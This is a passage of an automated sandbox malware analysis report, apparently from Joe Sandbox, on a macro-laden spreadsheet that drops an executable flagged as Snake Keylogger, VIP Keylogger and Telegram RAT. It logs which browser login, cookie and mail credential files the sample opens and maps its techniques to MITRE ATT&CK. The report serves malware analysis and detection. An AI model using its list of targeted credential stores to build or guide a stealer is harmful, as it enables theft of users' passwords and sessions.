Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

Code function: 6_2_00007FFD102063BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00007FFD102063BC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

Yara detected VIP Keylogger

Source: Yara match	File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.6507830113.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

Yara detected VIP Keylogger

Source: Yara match	File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.6507830113.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	52 Scripting	Valid Accounts	1 Native API	52 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	13 Exploitation for Client Execution	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Browser Extensions	311 Process Injection	13 Obfuscated Files or Information	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	111 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	124 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Regsvr32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO202503S.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

